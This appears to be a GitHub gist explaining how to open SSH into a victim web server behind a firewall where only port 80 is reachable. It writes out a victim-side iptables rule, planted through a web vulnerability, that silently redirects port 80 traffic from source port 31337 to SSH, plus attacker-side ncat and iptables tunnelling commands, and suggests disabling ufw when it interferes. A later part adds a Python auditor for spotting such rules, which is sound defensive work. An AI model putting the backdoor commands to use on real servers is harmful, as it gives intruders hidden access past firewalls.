Last active
August 29, 2015 14:27
Open an SSH connection into a server that is protected by an external firewall where only port 80 is open
# The victim is a web server protected by an external firewall. Port 80 is open and port 22 (ssh) is filtered.
# You cannot connect to the server over ssh in this situation. But if you can run a single command (maybe via a web vulnerability),
# you can get into the server.
victim $ iptables -t nat -A PREROUTING -p tcp --dport 80 --sport 31337 -j DNAT --to :22
attacker $ ncat -e "/bin/nc <victim> 80 -p 31337" -l 2222
attacker $ ssh -p 2222 localhost
# Or use iptables
attacker $ sudo iptables -t nat -A POSTROUTING -d <victim ip> -p tcp --dport 80 -j SNAT --to :31337
attacker $ ssh -p 80 <victim ip>
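For defenders, the victim-side rule above is the artifact to audit for: a nat-table DNAT or REDIRECT rule that matches on a source port and rewrites the destination to a different port. The following is an added example, not part of the original gist; the function names are hypothetical and `SAMPLE` is constructed text in `iptables-save` format, assuming an IPv4 ruleset.

```python
import shlex

NAT_TARGETS = {"DNAT", "REDIRECT"}
SPORT_FLAGS = ("--sport", "--source-port")
TO_FLAGS = ("--to-destination", "--to", "--to-ports")

# Constructed sample in iptables-save format (not captured from a real host).
SAMPLE = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --sport 31337 --dport 80 -j DNAT --to-destination :22
-A PREROUTING -p tcp -m tcp --dport 8080 -j REDIRECT --to-ports 80
COMMIT
"""

def rule_options(tokens):
    """Map each flag of an '-A' rule to the value that follows it."""
    opts = {}
    for flag, value in zip(tokens, tokens[1:]):
        if flag.startswith("-") and not value.startswith("-"):
            opts[flag] = value
    return opts

def find_sport_keyed_redirects(ruleset):
    """Return nat rules that rewrite the port only for a given source port."""
    findings, table = [], None
    for line in ruleset.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]  # table header such as *nat or *filter
        if table != "nat" or not line.startswith("-A "):
            continue
        opts = rule_options(shlex.split(line))
        sport = next((opts[f] for f in SPORT_FLAGS if f in opts), None)
        to = next((opts[f] for f in TO_FLAGS if f in opts), "")
        port = to.rpartition(":")[2]  # ":22" -> "22", "10.0.0.5" -> no port
        to_port = port if port.replace("-", "").isdigit() else None
        if (opts.get("-j") in NAT_TARGETS and sport and to_port
                and to_port != opts.get("--dport")):
            findings.append({"chain": opts["-A"], "sport": sport,
                             "dport": opts.get("--dport"),
                             "to_port": to_port, "rule": line})
    return findings

if __name__ == "__main__":
    for f in find_sport_keyed_redirects(SAMPLE):
        print("suspicious nat rule:", f["rule"])
```

On a live host the input would be the output of `iptables-save`; ordinary port forwards without a source-port match, like the second nat rule in the sample, are not reported.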
It doesn't work if ufw is enabled.
(But you can disable ufw instead)